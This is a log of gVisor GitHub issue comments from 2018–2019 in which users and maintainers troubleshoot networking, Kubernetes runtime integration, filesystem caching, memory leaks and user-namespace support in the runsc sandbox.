@fvoznika i would love to contribute to this, but i don't quite understand what could be the fix here. I have seen that it was mentioned above that "implementing SO_REUSEPORT would be difficult", so could you please guide me to identify a fix for this?

[2018-11-22 03:55] avagin commented on #75
@praveensastry I'm working on this right now.

[2018-11-22 13:10] de13 opened #116 "crio untrusted workload in kubernetes reports errors"
As specified in the documentation, I use crio in order to run untrusted workloads with runsc. The K8s runs well, but if I specify runsc for untrusted workload, and annotate a pod with io.kubernetes.cri-o.TrustedSandbox=false, the pod stays in pending state, and I get the following error in my logs:

[code]

[2018-11-26 19:15] avagin commented on #75
https://gvisor-review.googlesource.com/c/gvisor/+/11201

[2018-11-27 21:08] erulabs commented on #113
Hello! Sorry for leaving this open - that did the trick - there is a chance I might get around to exposing that option, but I will make a new PR for that and not keep this issue open.

Thank you!

[2018-11-27 21:08] #113 closed

[2018-11-30 09:29] tanjianfeng opened #117 "Network stack code goes out of runsc/boot?"
Hi,

Currently, gvisor supports  epsocket, hostinet, rpcinet, and with more stacks adopting in foreseeable future. However, we now put stack for init, configure, or postInit, scatterred in runsc/boot/. For example,
1. epsocket's CreateLinksAndRoutes;
2. hostinet.NewStack;
3. rpcinet.NewStack (not in runsc/boot/ now, but somewhere out of pkg/sentry/socket/ definitely.

This does not seem a good pra

[2018-12-02 05:16] iangudger commented on #115
It appears that you are trying to connect to a DNS server on 127.0.0.11:53, but that there isn't a DNS server in the sandbox running on that port. When it comes to networking, the sandbox behaves like a VM. localhost is the sandbox's localhost. You might be able to talk to the DNS server on the host by using the host's IP address.

Another thing you can try is [enabling network passthrough](https:

[2018-12-03 10:43] boostpaal commented on #115
Network passthrough works but it's not a viable option for security reasons. I seems like Compose's native DNS server is the root of the problem. There might be a missing DNS feature that gVisor requires. I think submitting an issue to Compose would be the right way to go from here.

[2018-12-03 12:55] boostpaal commented on #115
We have resolved the issue. We tried to change the DNS server in Compose by:
[code]
However, `resolv.conf` inside the container would still be:
[code]
which would render the same problem.

When you look at the networks created by Compose, we see:
[code]

The `nodebug_default` network is created by Compose when it has `runsc` as runtime,  The Options object is empty:
[code]

The **bridge** network

[2018-12-06 02:36] ianlewis commented on #103
@matti I didn't get a chance to work on this specifically but I did add a [docs](https://github.com/google/gvisor/tree/master/docs) directory as a WIP place to build out a more scalable set of  docs. guides like the one you are looking for could go there

[2018-12-12 20:43] mikeroyal opened #119 "[Feature Request] Snap package support"
I was thinking in the install and setup could be improved for Ubuntu and other Linux distros by having a [snap package](https://snapcraft.io/) version. If it's not a priority would you mind if I made the snap as a contribution?

[Crafting your first snap](https://tutorials.ubuntu.com/tutorial/create-your-first-snap#0)

[Build and test snap](https://snapcraft.io/build)

[Getting Started snap templa

[2018-12-13 02:39] balopat opened #120 "kubectl exec error: failed to retrieve OCI runtime exec internal pid"
I'm running gvisor inside minikube with the containerd-gvisor-shim.
I'm wondering which layer this error is coming from:
[code]

Repro:

minikube 0.31.0
[code]
enable addon:
[code]
Then deploy an untrusted workload:

[code]

and try `kubectl exec nginx-untrusted -- dmesg`, the error message sporadically comes and goes, roughly 60% of the time.

gvisor and shim versions:

[code]

containerd version

[2018-12-13 04:16] balopat opened #121 "ReactJS app hangs running with gVisor"
Same setup as in https://github.com/google/gvisor/issues/120 except this is a larger nodejs app, instead of nginx running in minikube + gvisor + containerd.

My pod is stuck "Terminating"

[code]

kubelet logs:

[code]
containerd logs:
[code]

the runsc process is still up and running:

[code]
crictl inspect pod hangs too:

[code]

if I kill the processes manually, the pod goes away (inside miniku

[2018-12-13 04:34] balopat commented on #121
The sample project that I'm deploying is here: https://github.com/balopat/contribwall
This has two services 1.) a go based one - that happily runs in runsc, and 2.) a reactjs frontend - that seems to have issues when ran in runsc - for example even though the app comes up and reports that it's listening on port 3000 - it can't accept connections for some reason, even from within the container curl

[2018-12-13 07:56] balopat commented on #120
+ if I do the same without the untrusted-workload annotation - i.e. the container runs via runc - this issue does not come up. So it definitely either gvisor or gvisor-containerd-shim related.

[2018-12-13 21:16] saphoooo opened #122 "Can't lookup index.docker.io with gVisor in Kubernetes"
I've already open an issue with kaniko [issue #473](https://github.com/GoogleContainerTools/kaniko/issues/473). It's about building an image OCI with runsc and kaniko:

**Actual behavior**
I'm trying to build an image in Kubernetes with runsc, but it fails with error message:

[code]

**Expected behavior**
Without sandboxing in gVisor, the same build works well and push the image to the registry.

[2018-12-14 00:56] ianlewis commented on #120
See https://github.com/kubernetes/minikube/issues/3446. Closing for now. Will reopen if this ends up being gvisor related.

[2018-12-14 00:56] #120 closed

[2018-12-14 01:17] ianlewis commented on #116
@de13 BTW, which documentation did you use to set up crio & gVisor?

[2018-12-14 04:48] iangudger commented on #117
Having implementation-specific constructors for different implementations of an interface is a standard pattern. These different network stack implementations need very different inputs for initialization.

[2018-12-14 05:45] de13 commented on #116
Those provided by kaniko: https://github.com/GoogleContainerTools/kaniko#running-kaniko-in-a-kubernetes-cluster

[2018-12-14 09:20] tanjianfeng commented on #117
Thank you for reply.

Stacks can choose to implement some of the interfaces instead of all. For inputs, for Init, and PostInit(), stacks may not even care about the inputs, instead, they just need the proper time to get invoked. For Configure, IMHO, the inputs can be standardized, for almost all stacks, we need information like, links and routes. On my very limited experience, these are enough for

[2018-12-15 00:03] amscanne commented on #117
A patch would be great for discussion!

[2018-12-15 08:14] saphoooo commented on #122
The point is: I didn't use docker but cri-o. And yes I do.

[2018-12-18 05:45] fvoznika commented on #119
It would be great if you want to make a contribution for snap. You could add the code under `install/snap`.

[2018-12-18 22:40] fvoznika commented on #122
I could make it work using [minikube v0.31.0 and containerd](https://github.com/kubernetes/minikube/tree/master/deploy/addons/gvisor). I might be some compatibility issue between cri-o and gVisor. I'd recommend trying with [gvisor-containerd-shim](https://github.com/google/gvisor-containerd-shim).

[2018-12-19 19:43] fvoznika commented on #121
There are a few problems with inotify that this code is hitting:
1. inotify is over reporting changes to directories, e.g. notify access to watchers that care about modify only. This causes the application to be constantly compiling changes.
2. There is a deadlock in inotify code when epoll is watching directories and those directories are accessed. First stack is waiting on epoll, while the secon

[2018-12-20 12:19] ThunderYe opened #123 "Let user-network stack support CRI-Pod"
Hi all,
      I am working on gVisor supporting CRI-Pod mode, there is a problem, concern go-stack(epsocket),it will collect network interface within Sandbox-root container stage ,but in that time ,there are no any useful NIC or IP/Route info in that netns ,for CNI has not be called yet!

You see ,till now only the Host-int mode can work ,for it  just use Host-net-stack ,there are nothing to do!

[2018-12-21 00:17] fvoznika commented on #123
The network needs to be setup before the root container starts. The network can be configured in two ways:
1. **Before ```create``` is called:** create netns, configure it and send it in the [OCI spec](https://github.com/opencontainers/runtime-spec/blob/1722abf79c2f8f2675f47367f827c6491472cf27/specs-go/config.go#L184). Then the runtime will create the sandbox inside this namespace and read the con

[2018-12-21 00:31] fvoznika commented on #121
BTW, the pod hung as "Terminating" problem also affects runc with gVisor disabled. containerd has fixed some issues with stuck termination is more recent builds, so it's likely fixed. If I'm able to repro it again I'll report to containerd.

[2018-12-21 06:31] ThunderYe commented on #123
Thanks a lot  fvoznika for the quick feedback!

I think there are difference between docker-network and CRI-OCI-CNI mechanism, there  are 3 stage:
1) Create a runsc instance with Pause Image as Pod-sandbox;
2) CNI is called for the Pod-sandbox-netns;
3) Create  the APP-container in the Pod-Sandbox.
 CNI will work just between CRI-PosSandbox and APP-Container, there are no hook plugin point!

So co

[2018-12-21 23:11] fvoznika commented on #121
It should be working now. I'll close once the deadlock fix is submitted.

[2018-12-23 15:08] tanjianfeng commented on #117
Apologize for the delay. The RFC code is here: https://gvisor-review.googlesource.com/c/gvisor/+/13481

[2018-12-26 23:14] fvoznika commented on #123
It's possible to create and configure the netns before the pause container is executed. This is how CRI-containerd works. You can check [gvisor-containerd-shim](https://github.com/google/gvisor-containerd-shim) and [containerd](https://github.com/containerd/cri) to see how it's done. Depending on what you're trying to achieve, you might be able to use gvisor-containerd-shim straight out of the box

[2018-12-26 23:39] Random-Liu commented on #123
@ThunderYe We configure CNI before creating root container in containerd. https://github.com/containerd/cri/blob/master/pkg/server/sandbox_run.go#L129

If you are using containerd, you shouldn't have problem with this.

[2018-12-27 10:51] ThunderYe commented on #123
Thanks a  lot ,@Lantao Liu @fvoznika
In fact ,I am working on Pouch Project, unfortunately  it will start Pod-sandbox before setup Pod network.Then I have to persuade  them to follow containerd' method OR delay the network init as I described previously.

Pouch's code is here:
https://github.com/alibaba/pouch/blob/d09f9f75414ee4449ad743a3a8242d6485a80cfc/cri/v1alpha2/cri.go#L343

[2018-12-27 23:00] #121 closed

[2018-12-28 04:05] harishanand95 commented on #97
I'm facing a similar issue with `--network=host`.  `failed: Inappropriate ioctl for device` when I run command `ip addr`.

log file https://termbin.com/wws6

[2018-12-28 12:02] iangudger commented on #97
@harishanand95, would it be possible for you to post strace logs?

https://github.com/google/gvisor#debugging

[2018-12-29 06:30] harishanand95 commented on #97
@iangudger  Thanks,
https://termbin.com/u5z6

[2019-01-02 13:17] ThunderYe commented on #123
Seems gVisor need not change the Net stack configuration procedure ,for containerd and cri-o both setup the pod-network between Pod-sadbox started .
Let me close the issue, try to persuade the Pouch's guys .
Close the Issue!

[2019-01-02 13:17] #123 closed

[2019-01-04 05:32] happyrainbowxd opened #124 "file-access=shared mount folder not sync to host"
Hello,
I found a problem about docker bind mount with gvisor.
When mount a folder to gvisor, If host mount folder file changed, it will not sync to docker mount folder, but when docker mount folder changed, it will changed to host.

**Environment:**

Linux ubuntu 3.19.0-26-generic #28~14.04.1-Ubuntu SMP Wed Aug 12 14:09:17 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

Docker version 18.03.1-ce, build 9

[2019-01-07 01:59] chenggangqcg opened #125 "There are 2 sys directory in /proc"
Before filling an issue, please consult our FAQ: https://github.com/google/gvisor#faq--known-issues
Also check that the issue hasn't been reported before.

If you have a question, please email gvisor-users@googlegroups.com rather than filing a bug.

If you believe you've found a security issue, please email gvisor-security@googlegroups.com rather than filing a bug.

If this is your first time comp

[2019-01-07 02:00] chenggangqcg commented on #125
[root@4449fb910776 proc]# ls
1   cpuinfo      loadavg  mounts  self  sys  thread-self  version
24  filesystems  meminfo  net     stat  sys  uptime
=====================
gVisor version: The latest.

[2019-01-07 05:00] Liloyoung commented on #125
Thanks

⁣Gesendet mit TypeApp ​

Am 7. Jan. 2019, 03:00, um 03:00, chenggangqcg <notifications@github.com> schrieb:

[2019-01-07 06:34] iangudger commented on #125
Can you check if this patch fixes the problem? https://gvisor-review.googlesource.com/c/gvisor/+/13560

[2019-01-09 02:15] fvoznika commented on #124
The problem here is that file size is cached and it's not refreshed when the size changes. We need to check if the cache needs to be refreshed when the file is open. Possibly also when the read hits EOF using the cached length to ensure there is no more data to read.

[2019-01-11 01:56] ianlewis commented on #11
@jshachm Can you file a separate issue?

[2019-01-11 04:01] happyrainbowxd commented on #124
@fvoznika
Thanks for point out the problem.
@doodlesbykumbi
I found a possible way to fix this problem,
if you call "truncate" on container with this file, the cached file size and content will update immediately, reopen this file again, all the content from host site written can be read.
so maybe we can trace this function then update the volume mounting procedure to fix this.
[code]
call truncat

[2019-01-11 16:30] fvoznika commented on #117
@tanjianfeng, assigning to you since you were working on this.

[2019-01-11 16:32] fvoznika commented on #101
Closing for now, please re-open if you're able to gather more information.

[2019-01-11 16:32] #101 closed

[2019-01-11 16:44] fvoznika commented on #77
This works now. The error message is bit too verbose, I send a fix to make more readable:

[code]

[2019-01-11 16:47] fvoznika commented on #53
Closing as this is something unlikely to be supported.

[2019-01-11 16:47] #53 closed

[2019-01-11 17:14] doodlesbykumbi commented on #124
@fvoznika Thanks. Yup, definitely interested. I'll pick one of those first issues up.

I'd got something working for this issue but I guess too late 🤷‍♂️ Is your work in review public visible somewhere ?

[2019-01-11 17:23] fvoznika commented on #124
Yes, you can see it in Gerrit: https://gvisor-review.googlesource.com/c/gvisor/+/13720

[2019-01-12 07:08] happyrainbowxd commented on #124
@fvoznika Thank you, I've tested, It works fine now : )!

BTW, "file-access=exclusive" have the same bug, but little difference is both host and container not sync, and the file size is also not changed, do you have any idea?

[2019-01-14 01:27] chenggangqcg opened #126 "/proc/loadavg is a dummy interface."
Hi：
     I need to use the interface /proc/loadavg, but it's value are all zero now.
     Do you have any plan to support loadavg interface?

Chenggang
Thanks

[2019-01-14 01:56] #117 closed

[2019-01-14 01:57] tanjianfeng commented on #117
As maintainers suggest to keep network configuration in runsc, I'm closing this issue. Thank you all for your inputs.

[2019-01-14 04:05] KnoooW opened #127 "latest build runsc can't run with docker"
tested on
`linux centos kernel 4.9`

[code]
[code]

[code]

The Error Message:
[code]

[2019-01-16 06:18] fvoznika commented on #126
I see your change in Gerrit. Thanks for submitting it.

[2019-01-16 06:41] fvoznika commented on #127
You need [docker version 17.09.0 or greater](https://github.com/google/gvisor#requirements).

[2019-01-16 06:41] #127 closed

[2019-01-16 13:47] chenggangqcg commented on #126
Welcome:)

[2019-01-17 02:33] ianlewis commented on #126
For reference:
https://gvisor-review.googlesource.com/c/gvisor/+/13820
https://gvisor-review.googlesource.com/c/gvisor/+/13821

[2019-01-18 19:43] amscanne opened #128 "node.Readdir does not handle integer overflow"
I produced this issue using coverage-directed fuzzing. It looks like an integer wrap issue causing a panic.

[code]

[2019-01-19 01:36] #77 closed

[2019-01-21 04:26] KnoooW opened #129 "runsc on docker 18.09.1 runsc invalid argument"
centos 7
docker fail,
FATAL ERROR: creating container: fork/exec /usr/local/bin/runsc: invalid argument

runsc info
[code]
docker info
[code]

runsc create log
[code]

[2019-01-21 09:42] ianlewis commented on #129
Yeah, it's possible this error message may be related to an unsupported kernel version. It would be nice if gVisor could provide some better error messages regarding the kernel version or binary you're trying to run.

[2019-01-22 09:33] happyrainbowxd commented on #124
Thank you, @fvoznika I think this issues is totally solved :)

[2019-01-22 09:33] #124 closed

[2019-01-22 09:36] DocOBITCOIN opened #130 "Es"
Before filling an issue, please consult our FAQ: https://github.com/google/gvisor#faq--known-issues
Also check that the issue hasn't been reported before.

If you have a question, please email gvisor-users@googlegroups.com rather than filing a bug.

If you believe you've found a security issue, please email gvisor-security@googlegroups.com rather than filing a bug.

If this is your first time comp

[2019-01-22 09:36] #130 closed

[2019-01-30 08:33] caoruidong opened #131 "bazel build with `-c dbg` failed"
build command `bazel build -c dbg runsc`
output
[code]

[2019-02-20 13:10] iamacarpet opened #133 "tmpfs not properly freeing memory after rsync"
Hello,

I found an issue while performing an rsync into a gVisor container on App Engine Standard, which when tested locally against gVisor, elicits the same behavior.

With /tmp mounted as tmpfs inside the container, after rsyncing the same files over and over again, the memory usage goes up and up, never to be freed (until the container is killed for using to much memory, as is the case for App

[2019-02-20 14:12] iamacarpet commented on #133
Debug data is too big to upload, so please find it at [1] (GCS, requestor pays).

Installation was the latest nightly installer as per instructions at [2].

[1] : https://storage.cloud.google.com/a1comms-debug-public/runsc/2019-02-20/runsc-final.tar.gz
[2] : https://github.com/google/gvisor#installation

[2019-02-20 18:58] prattmic commented on #133
Thanks for the detailed report! I suspect we have a reference counting issue that is causing us to keep the file in memory.

I can reproduce the issue with this script:

[code]

[code]

[2019-02-20 21:27] prattmic commented on #133
https://gvisor-review.googlesource.com/c/gvisor/+/14901 should fix this issue.

After:
[code]

[2019-02-21 08:55] iamacarpet commented on #133
@prattmic wow, an amazingly quick fix, thanks so much!

Any idea how long it'll take for that change to be deployed internally for App Engine?

[2019-02-21 18:21] everflux commented on #63
Any chance to try this out already?

[2019-02-26 11:34] archerbroler commented on #7
bluepill can be done on linux too. perhaps its not such hard to port gvisor to win.

[2019-02-26 18:04] amscanne commented on #7
I'm not familiar with the Windows hypervisor APIs, is there good reference documentation?

[2019-03-01 01:16] fvoznika commented on #131
I missed this somehow...fix for it is coming soon.

[2019-03-01 02:39] #131 closed

[2019-03-06 05:48] 360CodeSafe opened #134 "Compare uintptr with zero"
https://github.com/google/gvisor/blob/1718fdd1a8e16f36433b069a0f5d88ea7bdb65f5/pkg/sentry/fs/host/util_unsafe.go#L60

The `n` of the uintptr type is never less than zero.

[2019-03-06 23:07] #134 closed

[2019-03-06 23:53] fvoznika commented on #6
Old version of ping that still use raw sockets now works with gVisor (see 121db29a93c651b8b62e8701bb0f16c231b08257). More raw socket support is upcoming, stay tuned.

[2019-03-08 07:35] liusdu commented on #114
Hi @nlacasse @ianlewis  any update?

[2019-03-08 10:22] HazCod commented on #75
@avagin are there plans for merging your commits? I would really appreciate SO_REUSEPORT support since it e.g. helps nginx take on massive traffic loads.

[2019-03-08 18:56] iangudger commented on #75
It got merged as 652d068119052b0b3bc4a0808a4400a22380a30b. Please try it out!

[2019-03-14 11:23] ianlewis opened #135 "Implement System V message queues"
Syscall support for:
- msgget
- msgsnd
- msgrcv
- msgctl

[2019-03-14 11:25] ianlewis opened #136 "Implement POSIX message queues"
Syscall support for:
- MqOpe
- MqUnlink
- MqTimedsend
- MqTimedreceive
- MqNotify
- MqGetsetattr

[2019-03-14 11:30] ianlewis opened #137 "Implement System V semaphores"
Syscall support for:
- semtimedop

[2019-03-14 11:32] ianlewis opened #138 "Implement splice, tee and vmsplice"
Syscall support for
- splice
- tee,
- vmsplice

[2019-03-14 11:34] ianlewis opened #139 "Signalfd support"
Support for:
- signalfd
- signalfd4

[2019-03-14 11:37] ianlewis opened #140 "Implement setns"
Syscall support for:
- setns

[2019-03-14 18:10] prattmic commented on #137
Note that basic System V semaphore functionality is already implemented: semget, semop (except SEM_UNDO), basic semctl options.

[2019-03-19 01:40] #133 closed

[2019-03-19 02:22] prattmic commented on #133
This issue ended up being more involved than I expected, but this commit should fix it.

I don't work directly on App Engine, so I can't comment on when it will be available there.

[2019-03-19 13:24] GuhuangLS opened #142 "sentry io performance"
Hi
    I 'm  GuhuangLS  from ant finance；  I  found  some issues:io perfomance is poor;
    one read takes 113784 cycles;  2nd read takes 29976 cycle too;
    If mmap one file and memset ,  then   read  it,   the read takes 10000cycle;
    and only mmap  method  supports  pagecache;
    Normal  file operations(read/write) can't create pagecache;
    Will sentry  to be  improved  about   these?

[2019-03-19 14:03] ianlewis commented on #142
Hi @GuhuangLS! Thanks for creating the issue.

Do you have more details about how you are performing your test? Maybe a [gist](http://gist.github.com) or something like that?

[2019-03-19 14:12] martencassel opened #143 "typo "contaners" in runsc/cmd/list.go"
A typo was found: "contaners"

runsc/cmd/list.go
@@ -42,7 +42,7 @@ func (*List) Name() string {

 // Synopsis implements subcommands.Command.Synopsis.	// Synopsis implements subcommands.Command.Synopsis.
func (*List) Synopsis() string {	func (*List) Synopsis() string {
	return "list contaners started by runsc with the given root"		return "list containers started by runsc with the given root"
}

[2019-03-19 14:38] amscanne commented on #142
Hi Guhuang,

Yes -- there are page cache related changes in flight right now (e.g. [1]). I'm not sure they will be initially connected to standard reads and writes, but it lays the groundwork to do so.

@nixprime can share more details.

[1] https://gvisor-review.googlesource.com/c/gvisor/+/15406

[2019-03-20 01:20] GuhuangLS commented on #142
Hi   Ianlewis
    1.   This is testcase :
`
#define RW_SIZE 4096
#define MMAP_SIZE 200 * 1024 * 1024
#define MALLOC_SIZE 4096  + 1024
#define READ_TIME  8
#define ENABLE_CACHE
char buf[8192];
int main(int argc, char *argv[])
{
	int fd = -1, i, j;
	int ret;
	void *addr;

	fd = open("/home/test.file", O_RDWR | O_CREAT, 0777);
	if (fd < 0) {
		printf("open file error:%d\n", fd);
		return -1;
	}
#ifde

[2019-03-20 01:50] GuhuangLS commented on #142
Hi amscanne
    Thanks;   mem  reclaim offered by nixprime  at the patch;

     Will hot/cold page manangement  to be added to reclaim module;?

     I see writeback contained in reclaim module;
     Will  independent writeback mechanism be devloped?

     According to test result,  cache is useful  to  standard reads and writes;

[2019-03-20 04:24] chenggangqcg commented on #142
Could we use the current cache policy to support read() operation for the readonly files?
In current version, the "page cache" is only effective for mmap() operation.

[2019-03-20 04:37] amscanne commented on #142
Read-ahead style page cache is complicated because of the reclaim implications. And if we don't reclaim, then memory usage can grow in an unbounded way, and we also lose the many process-like properties of the sandbox.

The current patch queue adds support for "memory pressure" and basic reclaim/eviction. I believe that is minor follow-on work to enable it for a read-ahead page cache. (Ideally a p

[2019-03-20 06:41] GuhuangLS commented on #142
Thanks    Amscanne
     Now  I  understood more about io ；

     Hi   nixprime   @nixprime
     Ask for advice;
     Are  the  writeback and read/write cache  in the plan ?
     Thanks;

[2019-03-20 12:31] mirabilos opened #144 "docker: Error response from daemon: OCI runtime create failed: /var/lib/docker/runtimes/runsc did not terminate sucessfully: creating container: fork/exec /proc/self/exe: operation not permitted"
I cannot start a simple example container with runsc, the normal thingy works though (after [a manual setup step](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=925115)).

I’ve yesterday downloaded your binary build and set it up following the instructions on the Github page (except I used `/etc/init.d/docker` instead of systemd, obviously) and get this (requested debugging output is at the bot

[2019-03-20 12:33] mirabilos commented on #144
Forgot the uname:

    Linux tglase.lan.tarent.de 4.18.0-2-amd64 #1 SMP Debian 4.18.10-2 (2018-11-02) x86_64 GNU/Linux

[2019-03-20 16:36] fvoznika commented on #144
Check that `/usr/local/bin/runsc` has execute access given to all. The sandbox run as user `nobody` and fails with the error above if it doesn't have permission to execute runsc.

[2019-03-20 22:00] D-Nice opened #145 "userns-remap default is unsupported"
What I would consider an important security setting, appears unsupported by runsc. When I set `"userns-remap": "default"` in the daemon conf file, trying to run any container with runsc as the runtime causes it to fail (default runtime works fine).

Commands attempted:
[code]

[code]

Docker version:
[code]

uname (void linux)
`
Linux void-nvme2 4.20.16_1 #1 SMP PREEMPT Thu Mar 14 20:39:59 UTC 201

[2019-03-20 22:44] nixprime commented on #142
To clarify the behavior of the page cache:

1. (All of the following only applies to gofer-backed files for which host file descriptors are not avaliable.)

2. When a file is mmapped and the resulting mapping is touched, the sentry caches the touched pages (and possibly some following pages, as a readahead mechanism) into the sentry page cache. This is required to implement mmap.

3. When a file i

[2019-03-20 22:46] mirabilos commented on #144
Fabricio Voznika dixit:

-r-xr-xr-x 1 root bin 19246606 Mär 19 22:17 /usr/local/bin/runsc*

Sure.

[2019-03-20 22:47] nixprime commented on #142
@GuhuangLS, can you clarify a few more points about your experimental configuration:

- What platform are you using? Ptrace, KVM, or something else?

- What is the filesystem being accessed, and how are you accessing it? Is it the local host filesystem, through runsc/fsgofer, or something else?

- Where are you adding calls to RDTSC

[2019-03-21 01:16] GuhuangLS commented on #142
Hi  nixprime  @nixprime

    platform independent

1.File : /home/test.file
2.fs: rootfs
3.read path: gr3 userspace:read() ->
                  gr0: fs/file.go -> file_overlay.go -> gofer/file.go->inode_cached.go->usermem->safemem->secio->fd->syscall->
                  hr0:host;

I add rdtsc at read path  which uses interface:
1st read test: add here
`
	Time2 := time.Rdtsc()
		n, err :=  f.inodeO

[2019-03-21 01:41] GuhuangLS commented on #142
nixprime @nixprime
  ”There is an in-progress patch that follows the above series that causes read() (and related syscalls such as pread(), readv(), etc.) to cache pages when memory pressure information is available. It does not change write(). “

       The patch adds  cache only for standard read syscall  which  can create pagecache without mmap?
       Thanks

[2019-03-21 15:27] nixprime commented on #142
The patch in question affects all syscall-driven reads: read(), pread(), readv(), preadv(), etc. Yes, it allows the sentry to read pages into the sentry page cache whether or not those pages are mmapped. However:

gr0: fs/file.go -> file_overlay.go -> gofer/file.go->inode_cached.go->usermem->safemem->secio->fd->syscall->
hr0:host;

None of the patches involved affect this path. As previously menti

[2019-03-21 15:51] fvoznika commented on #145
runsc always runs the container inside a user namespace that is isolated from the host. The user namespace exists only inside the sandbox and has no connection to the host. Therefore, there is no need to use `userns-remap` to isolate containers from the host. There is only one case where gVisor uses the host's user namespace that I explain below.

The gVisor kernel appears just like a regular proc

[2019-03-21 16:12] fvoznika commented on #144
Hmm..., the log shows that the gofer process (which runs as the same user) was able to be started correctly. But the sandbox, which runs with a restricted user failed with `operation not permitted`. Could you try to execute runsc as the nobody user just to double check that is not a permission issue?

[code]

[2019-03-21 23:58] mirabilos commented on #144
Fabricio Voznika dixit:

(btw mksh is a much cooler shell)

-----BEGIN cutting here may damage your screen surface-----
(sid-amd64)tglase@tglase:~ $ sudo -u nobody bash
[sudo] password for tglase:
(sid-amd64)nobody@tglase:/home/tglase$ /usr/local/bin/runsc
I0322 00:53:16.405587   24559 x:0] ***************************
I0322 00:53:16.405674   24559 x:0] Args: [/usr/local/bin/runsc]
I0322 00:53:16.4

[2019-03-22 02:15] GuhuangLS commented on #142
Hi    nixprime
`
The patch in question affects all syscall-driven reads
`
Can Data be consistent between read and write？
`
avoids the memory overhead of caching file pages twice (in both the host and sentry page caches)
`
host syscall  uses direct io, only  sentry keep cache?

`
This ensures that the file's contents as seen from inside the sandbox remain consistent in the presence of file access a

[2019-03-22 02:20] chenggangqcg commented on #142
“avoids the memory overhead of caching file pages”
===========
We might use DAX to avoid host's pagecache.

[2019-03-22 03:39] jmillikin-stripe opened #146 "Flow (HHVM) "Out of shared memory""
Flow (https://flow.org/, type checker for JavaScript) has an assertion in its memory manager that the filesystem used for temp files is larger than a size (flag-configured). This check is implemented with `statvfs()`, and fails under gVisor because the computed size is zero.

Flow code implementing the check: https://github.com/facebook/flow/blob/v0.95.1/hack/heap/hh_shared.c#L643-L654

Reduced te

[2019-03-22 04:01] amscanne commented on #146
Thanks for this report.

We've hit this with applications before, and I'll add a little context. I believe this is technically an incorrect check. On a tmpfs filesystem, size=0 means unlimited. (Memory used for tmpfs files is still charged to the containing cgroup, but there is no independent limit for the tmpfs mount.) Linux will exhibit the same behavior if you mount with size=0, but it defaults

[2019-03-22 04:17] GuhuangLS commented on #142
Hi nixprime
”This ensures that the file's contents as seen from inside the sandbox remain consistent in the presence of file access and mutation from parties outside the sandbox,”
I have a doubt：
“2 givsor container A and B ;
A has rw permission about file  x access;
B has r permission about file  x access;
B reads data to its buf from file x; A writes  new data to the file x; B keeps old data at

[2019-03-22 07:15] prattmic commented on #146
It looks like this is also in the fallback path for lack of memfd support. @mrahatm is working on memfd in https://gvisor-review.git.corp.google.com/c/gvisor/+/13220, so getting that in should also resolve things.

[2019-03-22 20:28] #129 closed

[2019-03-22 20:35] prattmic commented on #146
To follow-up, flow seems to work fine with https://gvisor-review.git.corp.google.com/c/gvisor/+/13220.

[code]

[2019-03-22 21:42] prattmic commented on #146
I filed https://github.com/facebook/hhvm/issues/8470 to make the HHVM folks aware of the issue with their check, but the best way forward for us is to get `memfd_create` in, plus potentially reporting a non-zero size by default.

For reference of the special case, see the [tmpfs docs](https://www.kernel.org/doc/Documentation/filesystems/tmpfs.txt): "If nr_blocks=0 (or size=0), blocks will not be l

[2019-03-22 21:58] jmillikin-stripe commented on #146
Thanks for the triage and investigation! I'll wait for memfd support and/or sized tmpfs to land.

[2019-03-22 22:41] D-Nice commented on #145
I would hope that is the case, but that has not been my experience thus far.

Running

`docker run --runtime=runsc --rm -v /root/:/tmp/root -u root ubuntu /bin/touch "/tmp/root/rootfile"`

Yields the creation of the rootfile under my hosts `/root` path. I think we understand what other chaos this can cause and it effectively yields any user capable of running docker, root. If the aforementioned is

[2019-03-22 22:44] fvoznika commented on #144
Is there anything in your configuration that would prevent docker's user from creating namespaces, setting chroot or capabilities, etc? There is basically something causing `exec.Cmd.Start()` fail with `EPERM`. `exec.Cmd` is configured in [Sandbox.createSandboxProcess](https://github.com/google/gvisor/blob/3d0b960112c94379e4974fd9b60d4632548a4389/runsc/sandbox/sandbox.go#L294).

[2019-03-22 23:05] amscanne commented on #145
Can't a user just do: "docker run --userns=host --privileged" for root access anyways? I like the idea of supporting the userns here (so that the gofer is at least in the provided userns, and the noted touch don't work) but you should probably assume that any user capable of talking to the Docker daemon has effective root access. The configuration file setting is providing only a default IIUC.

[2019-03-22 23:26] D-Nice commented on #145
Yes, you're correct, but the remap at least provides mitigatation against some malicious containers, which can have that volume and user setup from a Dockerfile etc... whilst running the container privileged cannot be done from the container or Docker file itself (if I'm not mistaken).

[2019-03-22 23:41] amscanne commented on #145
Can the container metadata actually specify this kind of mount? The docker documentation seems to suggest that it cannot re: the VOLUME keyword in Dockerfiles:

"The host directory is declared at container run-time: The host directory (the mountpoint) is, by its nature, host-dependent. This is to preserve image portability, since a given host directory can’t be guaranteed to be available on all ho

[2019-03-22 23:51] D-Nice commented on #145
Yes, I guess you are correct in this regard it would still fall down to a careless user (good point regarding unspecified host-dir). However, since runsc aims to be a sandbox/security oriented runtime, I would still expect at the very least matching security capabilities to runc, and believe `userns-remap` is one of the most basic expected.

Or if there is some other alternative way, where I can f

[2019-03-22 23:58] mirabilos commented on #144
Fabricio Voznika dixit:

I don’t have a configuration, asides from what is mentioned on the
gvisor site (as I freshly installed Docker specifically to test some
software under gvisor).

I wouldn’t know. I’m a veteran unix admin, not a systemd user.
No idea what most of these even are.

This is in a chroot, but as far as I know it doesn’t prevent
further chrooting. Well at least not in proper Unix.

[2019-03-23 00:07] amscanne commented on #145
Yes, I agree that this feature should apply to the gofer (which is doing the file access above). Currently, the sentry will drop permissions and execute as nobody which what I believe is failing. I think it just needs to check whether it is a user namespace already and not drop permissions. (But how do you know if the user namespace is sufficiently? Maybe you're in a nested privileged container. U

[2019-03-24 15:43] tanjianfeng opened #147 "Unexpected segment fault for accessing mapped read-only file"
An unexpected segment fault error shows when testing below code:

[code]
It seems that there's a bug in inodeFileState, which properly handles: (1) readonly case; (2) writeonly case; (3) read-write after writeonly case., but not above example.

At the last line of above example, inodeFileState will return writeback (with writeonly permission) fd, for readonly mapping, which results in failure of h

[2019-03-24 23:01] avagin commented on #145
@D-Nice could you try out this patch https://gvisor.googlesource.com/gvisor/+/e5c934fd76acb8c31041f473152a2b61287b09ad%5E%21/

[2019-03-25 03:16] GuhuangLS commented on #142
Hi nixprime . @nixprime
Direct io doesn't work now?
I see  only cachePolicy.usePageCache() to determine wether to use inode cached layer, is that ?

